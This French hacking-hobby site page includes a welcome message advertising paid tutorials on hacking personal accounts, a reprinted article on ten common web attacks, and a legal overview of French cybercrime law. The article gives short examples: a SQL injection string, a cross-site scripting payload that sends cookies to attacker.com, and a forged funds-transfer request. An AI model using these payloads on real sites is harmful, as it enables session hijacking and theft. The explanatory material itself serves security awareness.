
N°1 Kali Linux
HACK THE PLANET
Je me nomme Numerius,
Et je suis un passionné de Linux
Bonjour à tous,
Pour commencer je vais me présenter.
Je suis Numerius et je suis un passionné de linux.
J’ai le plaisir de vous présenter notre Site Web qui est spécialisé sur le Hacking et la sécurité informatique.
Mais avant de commencer, vous devais savoir que le Hacking est illégales sans le consentement du propriétaire et que je ne suis en aucun cas responsable de vos actes.
Que pour commencer et avant toutes choses, vous devriez créer votre propre laboratoire, votre propre environnement, afin de pouvoir tester les diverses Attaques et défenses.
Notre Site Web est ouvert au débutant et au plus confirmer, vous en êtes tous les bienvenues, car j’ai comme passion l’informatique, la création de Site Web, le Web, le Dark Web, le Hacking et je serais ravi de partager mes passions avec vous.
Sur notre Site Web, vous trouverez tous ce qu’il vous faut pour naviguer sur Internet, car j’ai créé des pages, où j’ai rassemblé le maximum de liens et de moteurs de recherches du monde, que vous pourrez utiliser pour effectuer vos recherches Web.
Vous s’aurez également comment installer et utiliser Windows 11, Kali linux, Parrot Security, BlackArch linux et divers Scripte de Hacking, pour linux et Windows.
Vous s’aurez également comment rooter votre Android, pour pouvoir installer Kali Nethunter et Andrax, afin de pouvoir faire du Hacking avec votre téléphone où votre tablette.
Je vous ai également partager des tas de Tutos sur comment Hacker une Wifi, Hacker un PC, Hacker un téléphone, Hacker un Site Web, Hacker un compte Gmail, Hacker un compte Facebook et Hacker un compte Instagram.
Mais le plus important pour vous, je vous ais dégoter des tas de formations complète, que vous pourrez suivre en streaming et télécharger, sur le Hacking et la sécurité informatique, que je rajoute régulièrement sur notre Site Web, vous apprendrez toutes les bases du Hacking et de la sécurité informatique.
Vous trouverez également des tas d’autres choses, que je vous laisserais découvrir par vous-même, afin de vous réserver des surprises, en vous inscrivants à notre Site Web, qui j’espère vous plairas.
Et sachez que je vous invite à venir me rejoindre sur mon groupe Facebook du Groupe des Hackers Francophones, qui est entièrement en Français et vous en êtes tousses les bienvenues.
Que vous trouverez à l’adresse dans le texte ci-dessous :
https://www.facebook.com/groups/groupedeshackersfranchophones
Dessus nous pourrons faire connaissance et partager le maximum de chose sur notre passion qui est le Web, le Dark Web, le Hacking et la Sécurités informatiques.
Nous pourrions tousses nous donner rendez-vous, toutes les nuits, du samedi au dimanche à 01h00 du matin, pour ce retrouvé ensembles, afin de discuter et faire connaissances.
Et j’ai une mauvaise nouvelles pour vous, le site web est passé de Gratuit à Payant, car cela fait des mois et des mois, que j’espérais des dons de votre part et que je n’ai jamais rien reçu.
Alors j’ai dû rendre payant mon Sites Web, comme vous l’avez remarqué toutes les pages du Site Web ont été cacher et verrouiller, la seul façons d’accéder aux contenues de chacune des pages, est de vous acquitter de la sommes de 10 Euros pour un abonnement annuel.
Je vous remercie par avance de vos inscriptions et de vos payements, car cela me permettrait toujours et toujours d’en faire plus pour vous et peut être grâce à vous d’aller boire un café, de vous partager toujours plus de contenues sur le Hacking et la Sécurité Informatique.
Je vous remercie de m’avoir accordé les choses les plus précieuses en ce bas monde, c’est-à-dire votre temps et votre intentions.
Je vous souhaite une bonne journée et à bientôt.
Cordialement Numerius.
C’est quoi un Hacker !!!
Top 10 Linux de Pentesting
Top 10 des Applications Android de Pentesting
Les Hackers les plus recherchés du Monde
Faites vos premières étapes dans la Sécurité Informatique.
Mais attention utilisez vos compétences dans votre propre laboratoire et avec le consentement du propriétaire.
La découverte de Malware
L’utilisation de Malwares sur Windows
L’utilisation de Malwares sur Kali Linux

10 Façons les plus populaires pour les Hackers de pirater votre Site Web
Quiz pop: qu’est-ce que Microsoft, Twitter, Facebook, NBC, ZenDesk et Drupal ont en commun?
Ils ont tous été récemment piratés.
Oui, le piratage est une menace croissante pour toutes les entreprises, grandes et petites.
Qu’il s’agisse de voler des données privées, de prendre le contrôle de votre ordinateur ou de fermer votre site Web, les pirates peuvent avoir un impact sérieux sur n’importe quelle entreprise, à tout moment. Nous avons mené une analyse en toute sécurité depuis son existence sur différents vecteurs d’attaque possibles et, par conséquent, il a été prouvé avec un record de sécurité des applications Web en Inde et est actuellement en train de se mondialiser. Il y a des détails sur lesquels Defencely avait travaillé pour se faire un nom sur le portefeuille CIO pour son immense succès avec la sécurité des technologies de l’information en tant que fournisseur de services. À un grand étonnement, Defencely a non seulement résisté à son client dans le passé, mais maintenant il a fourni des recherches révolutionnaires pour tous ses clients avec des livrables spéciaux, les services de Defencely ayant été optés. Mais il y a un côté quiDefencely a choisi d’opter pour l’amélioration du monde du Web, et c’est le HACKING ÉTHIQUE WHITE HATEqui fait son chemin dans le monde des affaires et fournit des services de sécurité approfondis pour une protection globale de la sécurité Web à ses précieux clients. En dehors de chacun des services fournis par Defencely, il a maintenu un standard sage sur la chasse aux bogues et donc une excellence éprouvée pour ses livrables de qualité que les experts de la sécurité de l’équipe rouge. L’équipe rouge a pris la responsabilité de représenter Defencely dans diverses gratitudes, que ce soit pour la diffusion des problèmes de sécurité de l’information, la participation à des conférences sur la sécurité de l’information pour fournir gratuitement des tests industriels de pénétration pour une approche initiale et cela seul avait abouti à une déduction sage de la façon dont la sécurité pourrait simplement être une illusion pour le monde des affaires et comment les entreprises pourraient être ruinées pendant la nuit.
Les pirates peuvent attaquer de nombreuses façons, mais voici les dix façons les plus courantes de menacer la sécurité de votre site et de votre entreprise:
10. ATTAQUES PAR INJECTION
Les attaques par injection se produisent lorsqu’il y a des failles dans votre base de données SQL, vos bibliothèques SQL ou même le système d’exploitation lui-même. Les employés ouvrent des fichiers apparemment crédibles avec des commandes cachées, ou «injections», sans le savoir.
Ce faisant, ils ont permis aux pirates d’obtenir un accès non autorisé à des données privées telles que les numéros de sécurité sociale, le numéro de carte de crédit ou d’autres données financières.
EXEMPLE D’ATTAQUE PAR INJECTION TECHNIQUE:
Une attaque par injection pourrait avoir cette ligne de commande:
Requête de chaîne = « SELECT * FROM comptes WHERE custID = ‘ » + request.getParameter (« id ») + « ‘ »;
Le pirate modifie le paramètre ‘id’ dans son navigateur pour envoyer: ‘ou’ 1 ‘=’ 1. Cela modifie la signification de la requête pour renvoyer tous les enregistrements de la base de données des comptes au pirate, au lieu des seuls clients visés.
9. ATTAQUES DE SCRIPT INTERSITE
Le Cross Site Scripting, également connu sous le nom d’attaque XSS, se produit lorsqu’une application, une URL «get request» ou un paquet de fichiers est envoyé à la fenêtre du navigateur Web et contourne le processus de validation. Une fois qu’un script XSS est déclenché, sa propriété trompeuse fait croire aux utilisateurs que la page compromise d’un site Web spécifique est légitime.
Par exemple, si www.example.com/abcd.html contient un script XSS, l’utilisateur peut voir une fenêtre contextuelle demandant ses informations de carte de crédit et d’autres informations sensibles.
EXEMPLE DE SCRIPT TECHNIQUE INTERSITE:
Un exemple plus technique:
(Chaîne) page + = “<nom d’entrée = ‘creditcard’ type = ‘TEXT’ value = ‘” + request.getParameter (“CC”) + “’>”;
L’attaquant modifie le paramètre ‘CC’ de son navigateur pour:
‘> <script> document.location =’ http: //www.attacker.com/cgi-bin/cookie.cgi? foo = ‘+ document.cookie </script>’
Cela provoque l’envoi de l’ID de session de l’utilisateur sur le site Web de l’attaquant, permettant au pirate de pirater la session actuelle de l’utilisateur. Cela signifie que le pirate a accès aux informations d’identification de l’administrateur du site Web et peut en prendre le contrôle complet. En d’autres termes, piratez-le.
8. ATTAQUES D’AUTHENTIFICATION ET DE GESTION DE SESSION BRISÉES
Si le système d’authentification des utilisateurs de votre site Web est faible, les pirates peuvent en profiter pleinement.
Les systèmes d’authentification impliquent des mots de passe, la gestion des clés, des identifiants de session et des cookies qui peuvent permettre à un pirate d’accéder à votre compte depuis n’importe quel ordinateur (tant qu’ils sont valides).
Si un pirate exploite le système d’authentification et de gestion de session, il peut assumer l’identité de l’utilisateur.
Effrayant en effet.
Posez-vous ces questions pour savoir si votre site Web est vulnérable à une attaque d’authentification et de gestion de session rompue:
-
Les informations d’identification de l’utilisateur sont-elles faibles (par exemple stockées à l’aide du hachage ou du chiffrement)?
-
Les informations d’identification peuvent-elles être devinées ou remplacées par des fonctions de gestion de compte faibles (par exemple, création de compte, changement de mot de passe, récupération de mot de passe, ID de session faibles)?
-
Les ID de session sont-ils exposés dans l’URL (par exemple, réécriture d’URL)?
-
Les ID de session sont-ils vulnérables aux attaques de fixation de session?
-
Les ID de session expirent-ils et les utilisateurs peuvent-ils se déconnecter?
Si vous avez répondu «oui» à l’une de ces questions, votre site pourrait être vulnérable à un pirate.
7. CLICKJACKING ATTACKS
Le détournement de clics, également appelé attaque de réparation d’interface utilisateur, est lorsqu’un pirate utilise plusieurs couches opaques pour inciter un utilisateur à cliquer sur la couche supérieure sans qu’il le sache.
Ainsi, l’attaquant «détourne» les clics qui ne sont pas destinés à la page réelle, mais à une page où l’attaquant veut que vous soyez.
Par exemple, en utilisant une combinaison soigneusement conçue de feuilles de style, de cadres iFrame et de zones de texte, un utilisateur peut être amené à croire qu’il tape le mot de passe de son compte bancaire, mais qu’il tape en fait dans un cadre invisible contrôlé par l’attaquant.
EXEMPLE DE DÉTOURNEMENT DE CLICS:
Voici un exemple en direct, mais sûr, du fonctionnement du détournement de clics:
http://attacker.kotowicz.net/alphabet-hero/game.html
Et voici une vidéo qui montre comment nous avons aidé Twitter à se défendre contre une attaque Clickjacking:
6. EMPOISONNEMENT DU CACHE DNS
L’empoisonnement du cache DNS implique d’anciennes données de cache que vous pensez peut-être ne plus avoir sur votre ordinateur, mais qui sont en fait «toxiques».
Également connu sous le nom de DNS Spoofing, les pirates peuvent identifier les vulnérabilités dans un système de nom de domaine, ce qui leur permet de détourner le trafic de serveurs légitimes vers un faux site Web et / ou serveur.
Cette forme d’attaque peut se propager et se répliquer d’un serveur DNS à un autre DNS, «empoisonnant» tout ce qui se trouve sur son chemin.
En fait, en 2010, une attaque d’empoisonnement DNS a complètement compromis le Great Firewall of China (GFC) temporairement et censuré certains contenus aux États-Unis jusqu’à ce que le problème soit résolu.
5. ATTAQUES D’INGÉNIERIE SOCIALE
Une attaque d’ingénierie sociale n’est pas techniquement un «hack».
Cela se produit lorsque vous divulguez des informations privées de bonne foi, comme un numéro de carte de crédit, via des interactions en ligne courantes telles que le courrier électronique, le chat, les sites de médias sociaux ou pratiquement n’importe quel site Web.
Le problème, bien sûr, est que vous n’entrez pas dans ce que vous pensez entrer.
Un exemple classique d’une attaque d’ingénierie sociale est l’arnaque «Microsoft tech support».
C’est quand quelqu’un d’un centre d’appels prétend être un membre du support technique MS qui dit que votre ordinateur est lent et / ou infecté, et peut être facilement réparé – à un coût, bien sûr.
Voici un article de Wired.com sur la façon dont un expert en sécurité a joué avec ce que l’on appelle le support technique Microsoft.
4. SYMLINKING – UNE ATTAQUE D’INITIÉ
Un lien symbolique est essentiellement un fichier spécial qui «pointe vers» un lien dur sur un système de fichiers monté. Une attaque de lien symbolique se produit lorsqu’un pirate informatique positionne le lien symbolique de telle manière que l’utilisateur ou l’application qui accède au point de terminaison pense qu’il accède au bon fichier alors qu’il ne l’est vraiment pas.
Si le fichier de point de terminaison est une sortie, la conséquence de l’attaque de lien symbolique est qu’il pourrait être modifié à la place du fichier à l’emplacement prévu. Les modifications apportées au fichier de point de terminaison peuvent inclure l’ajout, l’écrasement, la corruption ou même la modification des autorisations.
Dans différentes variantes d’une attaque par lien symbolique, un pirate peut être en mesure de contrôler les modifications apportées à un fichier, de s’accorder un accès avancé, d’insérer de fausses informations, d’exposer des informations sensibles ou de corrompre ou de détruire des fichiers système ou d’application vitaux.
3. ATTAQUES DE CONTREFAÇON DE DEMANDE INTERSITE
Une attaque de contrefaçon entre sites se produit lorsqu’un utilisateur est connecté à une session (ou un compte) et qu’un pirate utilise cette opportunité pour lui envoyer une fausse demande HTTP pour collecter ses informations de cookie.
Dans la plupart des cas, le cookie reste valide tant que l’utilisateur ou l’attaquant reste connecté au compte. C’est pourquoi les sites Web vous demandent de vous déconnecter de votre compte lorsque vous avez terminé – cela expirera la session immédiatement.
Dans d’autres cas, une fois que la session de navigation de l’utilisateur est compromise, le pirate peut générer des demandes à l’application qui ne pourront pas faire la différence entre un utilisateur valide et un pirate.
EXEMPLES D’ATTAQUES INTERSITES
Voici un exemple:
http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
<img src = ”<span style =” color: red; ”> http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct# </span>” width = ”0 ″ height =” 0 ″ / >
Dans ce cas, le pirate crée une demande qui transférera de l’argent du compte d’un utilisateur, puis intègre cette attaque dans une demande d’image ou une iframe stockée sur divers sites sous le contrôle de l’attaquant.
2. ATTAQUES D’EXÉCUTION DE CODE À DISTANCE
Une attaque d’exécution de code à distance est le résultat de faiblesses de sécurité côté serveur ou côté client.
Les composants vulnérables peuvent inclure des bibliothèques, des répertoires distants sur un serveur qui n’ont pas été surveillés, des infrastructures et d’autres modules logiciels qui s’exécutent sur la base d’un accès utilisateur authentifié. Les applications qui utilisent ces composants sont toujours attaquées par le biais de scripts, de logiciels malveillants et de petites lignes de commande qui extraient des informations.
Les composants vulnérables suivants ont été téléchargés 22 millions de fois en 2011:
Contournement d’authentification Apache CXF ( http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451 )
En omettant de fournir un jeton d’identité, les attaquants pourraient invoquer n’importe quel service Web avec une autorisation complète.
1. ATTAQUE DDOS – ATTAQUE PAR DÉNI DE SERVICE DISTRIBUÉ
DDoS, ou déni de services distribué, est l’endroit où les services d’un serveur ou d’une machine sont rendus indisponibles pour ses utilisateurs.
Et lorsque le système est hors ligne, le pirate informatique compromet tout le site Web ou une fonction spécifique d’un site Web à son propre avantage.
C’est un peu comme se faire voler sa voiture quand on a vraiment besoin d’aller vite.
Le programme habituel d’une campagne DDoS est d’interrompre temporairement ou de supprimer complètement un système fonctionnant avec succès.
L’exemple le plus courant d’une attaque DDoS pourrait être l’envoi de tonnes de demandes d’URL vers un site Web ou une page Web en très peu de temps. Cela provoque un goulot d’étranglement côté serveur car le processeur vient de manquer de ressources.
Les attaques par déni de service sont considérées comme des violations de la politique d’utilisation appropriée d’Internet du Conseil d’architecture Internet et violent également les politiques d’utilisation acceptable de pratiquement tous les fournisseurs de services Internet.
[maxbutton id = « 1 ″]
Écrit par Shritam Bhowmick sur14 juin 2013
Avertissement aux Hackers avant toutes inscriptions à ce Site Web !!!
Vous êtes seul Maître de vos Actes !!!
La cybercriminalité est une notion floue et abstraite qui a vu le jour à la fin des années 1990. Elle désigne «toutes les infractions pénales susceptibles de se commettre sur ou au moyen d’un système informatique généralement connecté à un réseau.». Selon l’OCDE, la cybercriminalité s’assimile à «tout comportement illégal, ou contraire à l’éthique, ou non autorisé, qui concerne un traitement automatique de données et, ou de transmission de données».
Le terme cybercriminalité renvoie à une nouvelle forme de délinquance qui se situe dans un espace virtuel communément appelé le «cyberespace». En effet, si Internet a permis à des millions de personnes d’accéder à d’innombrables informations, son développement a par ailleurs engendré la naissance du «cybercrime». Le terme cyber se voit ainsi associé à toutes sortes de délinquance: la «cyberfraude», le «cyberterrorisme», la «cyberpédophilie», etc.
C’est pourquoi la France, mais également la communauté internationale, souhaitent se prémunir contre cette menace. Au niveau national, le législateur, la doctrine et la jurisprudence se sont saisis du domaine d’Internet contribuant ainsi à l’émergence d’une nouvelle branche du droit: le «cyber droit pénal». L’internaute est un justiciable et nul n’est censé ignorer la loi.
Le 10 juin 2009, les sages du Conseil Constitutionnel ont estimé que l’accès à Internet est un droit fondamental pour les citoyens, ce qui limite, notamment, les moyens d’actions du législateur dans sa lutte contre la cybercriminalité.
La cybercriminalité est une des formes de délinquance qui connait actuellement la croissance la plus forte. La rapidité et la fonctionnalité des technologies modernes, conjuguées à l’anonymat qu’elles permettent, facilitent la commission de nombreux crimes et délits.
En réalité, cet anonymat est une chimère. Outre les hackers et autres virtuoses du web, chaque internaute est assez aisément identifiable. Le titulaire de l’accès à Internet par un abonnement est une personne physique, ou morale, qui se voit attribuer temporairement, ou pour toute la durée de son abonnement, une adresse IP lui permettant de communiquer sur Internet. L’adresse IP correspond à un numéro qui permet l’identification de chaque ordinateur connecté à Internet et par conséquent, l’identification de son utilisateur.
D’autre part, en matière d’investigation, les ordinateurs sont de véritables «réservoirs de preuves». Ce qui autrefois était consigné sur du papier a toutes les chances d’être aujourd’hui consigné sous forme numérique. Tout informaticien armé des bons outils peut retrouver et exhumer tous fichiers et dossiers compromettants pourtant soigneusement effacés.
Il apparait que la cybercriminalité renvoie à 3 types d’infractions:
Tout d’abord, il y a les formes traditionnelles de criminalité facilitées par les technologies de l’information et de la communication. La fraude ou l’escroquerie en sont de parfaits exemples. En effet, les arnaques, les fraudes ou encore le non-respect du copyright préexistent à Internet mais on ne peut nier quela toilea favorisé leur développement.
-
Sont visées ensuite les infractions dites «de contenu» telles que la pédophilie via Internet, le racisme ou la xénophobie. On ne peut pas tout faire et tout dire sur Internet, c’est pourquoi tous les blogueurs doivent faire preuve d’une certaine prudence. En effet, ces derniers peuvent êtres poursuivis s’ils commettent des infractions (diffamation, etc.) via leurs blogs.
-
Enfin, il y a le nouveau crime, celui qui a vu le jour avec les nouveaux réseaux électroniques. Ce sont les infractions visant les systèmes d’information et les systèmes de traitement de données. Le piratage est sans doute l’exemple le plus connu.
-
Le point commun de toutes ces infractions est qu’elles peuvent être commises à grande échelle. La distance géographique entre le lieu où l’acte délictueux est commis, et ses effets peut être considérable: un hacker basé à Strasbourg peut tout à fait pirater le système de sécurité d’une banque parisienne.
Il convient de s’intéresser aux diverses infractions que peut recouper la cybercriminalité:
LE HACKING OU PIRATAGE
Le terme piratage désigne l’utilisation de connaissances informatiques à des fins illégales.
L’article 323-1 du code pénal sanctionne«le fait d’accéder ou de se maintenir frauduleusement, dans tout ou partie d’un système de traitement automatisé». La peine encourue est 2 ans d’emprisonnement et 30000€ d’amende. Celle-ci peut être portée à 3 ans d’emprisonnement et 45000€ d’amende lorsqu’il en résulte «soit la suppression, soit la modifications de données contenues dans le système, soit un altération du fonctionnement de ce système».
Le hacker encourt également, au titre des peines complémentaires, la confiscation du matériel informatique qui a servi ou était destiné à commettre l’infraction.
Il convient de préciser que le hacker engage sa responsabilité pénale mais également sa responsabilité civile. Il devra ainsi verser des dommages-intérêts à la victime pour l’indemniser.
LE SPOOFING
Le «spoofing» s’apparente au «hacking». Il désigne le fait d’intervenir dans les communications entre une ou plusieurs machines dans le but de se substituer frauduleusement à une ou plusieurs des machines. Cela permet d’intercepter des données, des correspondances, ou encore d’envoyer des données en usurpant l’identité du titulaire de la machine «spoofée».
La répression est la même que pour le hacking à savoir deux ans d’emprisonnement et 30000€ d’amende. Le «spoofer» engage également sa responsabilité civile.
LE CARDING ET LE SKIMMING
Le «carding» désigne la création de cartes virtuelles. C’est une fraude à la carte bleue. En effet, sur certains sites, il est possible d’acheter ou de vendre des accès à des comptes bancaires, des numéros de cartes volés, des copies de pistes magnétiques et des profils personnels complets.
Le «skimming», quant à lui, désigne une opération frauduleuse qui consiste à faire des copies magnétiques des cartes bancaires à l’aide d’un lecteur mémoire appelé «skimmer». C’est également une fraude à la carte bancaire. Le code confidentiel peut ainsi être capté à l’aide d’une micro-caméra. Les données acquises sont inscrites sur les pistes magnétiques d’une carte contrefaite. Ces fausses cartes peuvent alors être utilisées dans les commerces ou pour des retraits de numéraires dans les distributeurs automatiques de billets.
L’article L163-4 du Code monétaire et financier punit de sept ans d’emprisonnement et de 750000€ d’amende, «le fait de contrefaire ou de falsifier une carte de paiement ou de retrait, de faire ou de tenter de faire usage, en connaissance de cause, d’une carte de paiement ou de retrait contrefaisante ou falsifiée, d’accepter, en connaissance de cause, de recevoir un paiement au moyen d’une carte de paiement contrefaisante ou falsifiée».
LE SCAMMING
Le «scamming» désigne toutes les arnaques faites par le biais d’Internet. Les arnaques sont multiples mais elles ont toutes pour but d’obtenir de la victime qu’elle effectue un virement depuis son compte bancaire.
Par exemple, l’escroquerie «à la nigérianne» se fait par l’intermédiaire de mails où «un soi-disant homme d’affaire, un orphelin ou une veuve sollicite de l’aide pour transférer des millions de dollars bloqués dans un pays en raison de problèmes politiques adaptées en fonction de l’actualité politique internationale. L’escroc sollicite une somme d’argent afin, soit de corrompre les autorités locales, soit de payer l’entreprise de gardiennage détenant le coffre. Un pourcentage de l’ordre de 10 à 15% du montant total est généralement promis. Les transferts d’argent en cash se font via des sociétés spécialisées comme Western Union».
Le «scammer» et ses complices peuvent être poursuivis pour fraude. L’article 313-1 du code pénal sanctionne, au titre de l’escroquerie, «le fait, soit par l’usage d’un faux nom ou d’une fausse qualité, soit par l’abus d’une qualité vraie, soit par l’emploi de manœuvres frauduleuses, de tromper une personne physique ou morale et de la déterminer ainsi, à son préjudice ou au préjudice d’un tiers, à remettre des fonds, des valeurs ou un bien quelconque, à fournir un service ou à consentir un acte opérant obligation ou décharge». L’auteur encourt une peine de 5 ans d’emprisonnement et de 375000€ d’amende».
La manipulation informatique est en effet considérée comme une manœuvre frauduleuse.
LE SPAMMING
Le «spamming» désigne l’envoi de courriers électroniques non sollicités. Tous les internautes ont déjà reçus des «Spams», ces courriers qui ont pour effet de «pourrir» les boîtes mail. En France, on parle d’ailleurs de «pourriels».
Cette pratique peut être sanctionnée sous diverses qualifications :
-
D’une part, cela peut être assimilé à une entrave, ou au fait de fausser le fonctionnement d’un système de traitement automatisé de données par déni de service, si l’envoi massif de courriers électroniques a eu pour effet de paralyser le serveur mail de la victime.
-
D’autre part, cela peut être assimilé à des prospections directes au moyen d’un courrier électronique utilisant les coordonnées d’une personne physique qui n’a pas donné son consentement préalable à recevoir des prospections directes par ce moyen; ce qui est sanctionné par le code de la consommation.